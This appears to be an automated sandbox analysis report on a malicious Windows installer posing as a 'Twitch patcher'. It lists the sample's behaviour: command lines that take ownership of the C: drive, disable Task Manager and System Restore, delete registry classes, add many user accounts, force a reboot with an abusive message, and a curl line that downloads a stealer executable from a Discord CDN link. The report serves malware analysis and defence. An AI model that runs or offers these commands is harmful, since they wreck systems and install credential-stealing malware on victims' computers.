Analysis Overview
SHA256
df9336b06d2a84b387a5d597d5d1ac01b81523c059cf535b53b1d43bfcedf5d7
Threat Level: Likely malicious
The file TwitchPatcherSetup.exe was found to be: Likely malicious.
Malicious Activity Summary
Possible privilege escalation attempt
Blocklisted process makes network request
Checks computer location settings
Drops startup file
Event Triggered Execution: Component Object Model Hijacking
Executes dropped EXE
Modifies file permissions
Modifies system executable filetype association
Enumerates connected drives
Sets desktop wallpaper using registry
Drops file in Program Files directory
System Location Discovery: System Language Discovery
Enumerates physical storage devices
Unsigned PE
Modifies system certificate store
Delays execution with timeout.exe
Kills process with taskkill
Uses Task Scheduler COM API
Uses Volume Shadow Copy service COM API
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Modifies registry class
Uses Volume Shadow Copy WMI provider
Runs net.exe
Script User-Agent
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-08-06 19:33
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-08-06 19:33
Reported
2024-08-06 19:36
Platform
win7-20240708-en
Max time kernel
82s
Max time network
141s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
Possible privilege escalation attempt
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mssec.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mssec.bat | C:\Windows\system32\cmd.exe | N/A |
Event Triggered Execution: Component Object Model Hijacking
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
Modifies system executable filetype association
| Description | Indicator | Process | Target |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\comfile\shell | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\edit\command | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\edit | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\print\command | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\ShellEx\ContextMenuHandlers\Compatibility | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\ShellEx\{8895b1c6-b41f-4c1c-a562-0d564250836f} | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\comfile\shellex | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\open\command | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\open | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\ShellEx\DropHandler | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\comfile\shell\open | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\runas\command | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\runas | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\runasuser\command | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\comfile\DefaultIcon | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\comfile\shell\open\command | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\comfile\shellex\DropHandler | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\DefaultIcon | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\print | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\runasuser | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\ShellEx\ContextMenuHandlers | C:\Windows\system32\reg.exe | N/A |
Enumerates connected drives
Drops file in Program Files directory
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\DllHost.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Modifies registry class
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474 | C:\Windows\System32\WScript.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob | C:\Windows\System32\WScript.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob | C:\Windows\System32\WScript.exe | N/A |
Runs net.exe
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\shutdown.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\system32\shutdown.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Uses Volume Shadow Copy WMI provider
Uses Volume Shadow Copy service COM API
Processes
C:\Users\Admin\AppData\Local\Temp\TwitchPatcherSetup.exe
"C:\Users\Admin\AppData\Local\Temp\TwitchPatcherSetup.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\C11D.tmp\C11E.tmp\C11F.bat C:\Users\Admin\AppData\Local\Temp\TwitchPatcherSetup.exe"
C:\Windows\system32\takeown.exe
takeown /f C:\*.*
C:\Windows\system32\icacls.exe
Icacls C:\*.* /C /G Admin:F
C:\Windows\system32\reg.exe
REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v DisableTaskMgr /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9388.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9057.vbs"
C:\Windows\system32\timeout.exe
timeout 60
C:\Windows\system32\rundll32.exe
rundll32 user32.dll, SwapMouseButton
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\22951.vbs"
C:\Windows\system32\timeout.exe
timeout 14
C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{3F6B5E16-092A-41ED-930B-0B4125D91D4E}
C:\Windows\system32\taskkill.exe
taskkill /F /IM hl2.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM javaw.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM RobloxPlayerBeta.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM FortniteClient-Win64-Shipping.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM Among Us.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM firefox.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM msedge.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM brave.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM iexplore.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM explorer.exe
C:\Windows\system32\shutdown.exe
shutdown -r -t 300 -c "Dans 5 minutes tu n'as plus de PC fils de viol, la OGK t'a bien baiser le cul :)"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\13200.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\16799.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\1123.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\29779.vbs" 11577.bat
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\21530.vbs"
C:\Windows\System32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\11577.bat" "
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\21530.vbs"
C:\Windows\system32\net.exe
net user LE bitasse /add /expire:never /active:yes
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user LE bitasse /add /expire:never /active:yes
C:\Windows\system32\net.exe
net user 18-25 bitasse /add /expire:never /active:yes
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user 18-25 bitasse /add /expire:never /active:yes
C:\Windows\system32\net.exe
net user T'A bitasse /add /expire:never /active:yes
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user T'A bitasse /add /expire:never /active:yes
C:\Windows\system32\net.exe
net user BIEN bitasse /add /expire:never /active:yes
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user BIEN bitasse /add /expire:never /active:yes
C:\Windows\system32\net.exe
net user D?TRUIT bitasse /add /expire:never /active:yes
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user D?TRUIT bitasse /add /expire:never /active:yes
C:\Windows\system32\net.exe
net user LE bitasse /add /expire:never /active:yes
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user LE bitasse /add /expire:never /active:yes
C:\Windows\system32\net.exe
net user CUL bitasse /add /expire:never /active:yes
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user CUL bitasse /add /expire:never /active:yes
C:\Windows\system32\net.exe
net user ENFANT bitasse /add /expire:never /active:yes
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user ENFANT bitasse /add /expire:never /active:yes
C:\Windows\system32\net.exe
net user DE bitasse /add /expire:never /active:yes
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user DE bitasse /add /expire:never /active:yes
C:\Windows\system32\net.exe
net user SATAN bitasse /add /expire:never /active:yes
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user SATAN bitasse /add /expire:never /active:yes
C:\Windows\system32\net.exe
net user 265822375520895 bitasse /add /expire:never /active:yes
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user 265822375520895 bitasse /add /expire:never /active:yes
C:\Windows\system32\net.exe
net user 19125836817209 bitasse /add /expire:never /active:yes
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user 19125836817209 bitasse /add /expire:never /active:yes
C:\Windows\system32\net.exe
net user 30108148877259 bitasse /add /expire:never /active:yes
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user 30108148877259 bitasse /add /expire:never /active:yes
C:\Windows\system32\net.exe
net user 239251573925627 bitasse /add /expire:never /active:yes
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user 239251573925627 bitasse /add /expire:never /active:yes
C:\Windows\system32\net.exe
net user 18963165974 bitasse /add /expire:never /active:yes
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user 18963165974 bitasse /add /expire:never /active:yes
C:\Windows\system32\net.exe
net user 1632344953653 bitasse /add /expire:never /active:yes
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user 1632344953653 bitasse /add /expire:never /active:yes
C:\Windows\system32\net.exe
net user 4678262487395 bitasse /add /expire:never /active:yes
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user 4678262487395 bitasse /add /expire:never /active:yes
C:\Windows\system32\net.exe
net user 937014730975 bitasse /add /expire:never /active:yes
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user 937014730975 bitasse /add /expire:never /active:yes
C:\Windows\system32\net.exe
net user 311411974722731 bitasse /add /expire:never /active:yes
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user 311411974722731 bitasse /add /expire:never /active:yes
C:\Windows\system32\net.exe
net user 20505218385761 bitasse /add /expire:never /active:yes
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user 20505218385761 bitasse /add /expire:never /active:yes
C:\Windows\system32\net.exe
net user 271022012222756 bitasse /add /expire:never /active:yes
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user 271022012222756 bitasse /add /expire:never /active:yes
C:\Windows\system32\net.exe
net user 20921730826316 bitasse /add /expire:never /active:yes
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user 20921730826316 bitasse /add /expire:never /active:yes
C:\Windows\system32\net.exe
net user 265822599218799 bitasse /add /expire:never /active:yes
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user 265822599218799 bitasse /add /expire:never /active:yes
C:\Windows\system32\net.exe
net user 103561796027639 bitasse /add /expire:never /active:yes
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user 103561796027639 bitasse /add /expire:never /active:yes
C:\Windows\system32\net.exe
net user 123482739727087 bitasse /add /expire:never /active:yes
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user 123482739727087 bitasse /add /expire:never /active:yes
C:\Windows\system32\net.exe
net user 200142976626644 bitasse /add /expire:never /active:yes
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user 200142976626644 bitasse /add /expire:never /active:yes
C:\Windows\system32\net.exe
net user 315832113316963 bitasse /add /expire:never /active:yes
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user 315832113316963 bitasse /add /expire:never /active:yes
C:\Windows\system32\net.exe
net user 230521891520729 bitasse /add /expire:never /active:yes
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user 230521891520729 bitasse /add /expire:never /active:yes
C:\Windows\system32\reg.exe
reg delete HKCR /F
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | crl.microsoft.com | udp |
| GB | 2.18.190.80:80 | crl.microsoft.com | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\C11D.tmp\C11E.tmp\C11F.bat
C:\Users\Admin\AppData\Local\Temp\9388.vbs
C:\Users\Admin\AppData\Local\Temp\9057.vbs
C:\Users\Admin\AppData\Local\Temp\22951.vbs
C:\Users\Admin\AppData\Local\Temp\1123.vbs
C:\Users\Admin\AppData\Local\Temp\13200.vbs
C:\Users\Admin\AppData\Local\Temp\16799.vbs
C:\Users\Admin\AppData\Local\Temp\21530.vbs
C:\Users\Admin\AppData\Local\Temp\29779.vbs
C:\Users\Admin\AppData\Local\Temp\11577.bat
\??\PIPE\samr
C:\Users\Admin\AppData\Local\Temp\CabF069.tmp
C:\Users\Admin\AppData\Local\Temp\TarF08B.tmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-08-06 19:33
Reported
2024-08-06 19:36
Platform
win10v2004-20240802-en
Max time kernel
99s
Max time network
130s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
Possible privilege escalation attempt
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\TwitchPatcherSetup.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\cmd.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mssec.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mssec.bat | C:\Windows\system32\cmd.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\melter.exe | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\X: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\D: | C:\Windows\System32\WScript.exe | N/A |
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1617997407-risitas.jpg" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper | C:\Windows\system32\reg.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\server\classes.jsa | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\jre\bin\server\classes.jsa | C:\Windows\system32\cmd.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\melter.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
Runs net.exe
Script User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: 33 | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\shutdown.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\system32\shutdown.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\WScript.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\WScript.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\TwitchPatcherSetup.exe
"C:\Users\Admin\AppData\Local\Temp\TwitchPatcherSetup.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\489D.tmp\489E.tmp\489F.bat C:\Users\Admin\AppData\Local\Temp\TwitchPatcherSetup.exe"
C:\Windows\system32\takeown.exe
takeown /f C:\*.*
C:\Windows\system32\icacls.exe
Icacls C:\*.* /C /G Admin:F
C:\Windows\system32\reg.exe
REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v DisableTaskMgr /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f
C:\Windows\system32\curl.exe
curl "https://cdn.discordapp.com/attachments/1195864694343336009/1198255413704007800/cstealer.exe" --output salope.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4448,i,1602949858158667699,12464335823361976127,262144 --variations-seed-version --mojo-platform-channel-handle=4412 /prefetch:8
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9391.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\26921.vbs"
C:\Windows\system32\timeout.exe
timeout 60
C:\Windows\system32\rundll32.exe
rundll32 user32.dll, SwapMouseButton
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\14246.vbs"
C:\Windows\system32\timeout.exe
timeout 14
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x394 0x4f4
C:\Windows\system32\taskkill.exe
taskkill /F /IM hl2.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM javaw.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM RobloxPlayerBeta.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM FortniteClient-Win64-Shipping.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM Among Us.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM firefox.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM msedge.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM brave.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM iexplore.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM explorer.exe
C:\Windows\system32\shutdown.exe
shutdown -r -t 300 -c "Dans 5 minutes tu n'as plus de PC fils de viol, la OGK t'a bien baiser le cul :)"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\23948.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\20725.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\4235.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\26852.vbs" 28089.bat
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\28089.bat" "
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\net.exe
net user LE bitasse /add /expire:never /active:yes
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user LE bitasse /add /expire:never /active:yes
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\risitas.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Users\Admin\AppData\Local\Temp\melter.exe
melter.exe
C:\Windows\system32\net.exe
net user 18-25 bitasse /add /expire:never /active:yes
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user 18-25 bitasse /add /expire:never /active:yes
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\net.exe
net user T'A bitasse /add /expire:never /active:yes
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user T'A bitasse /add /expire:never /active:yes
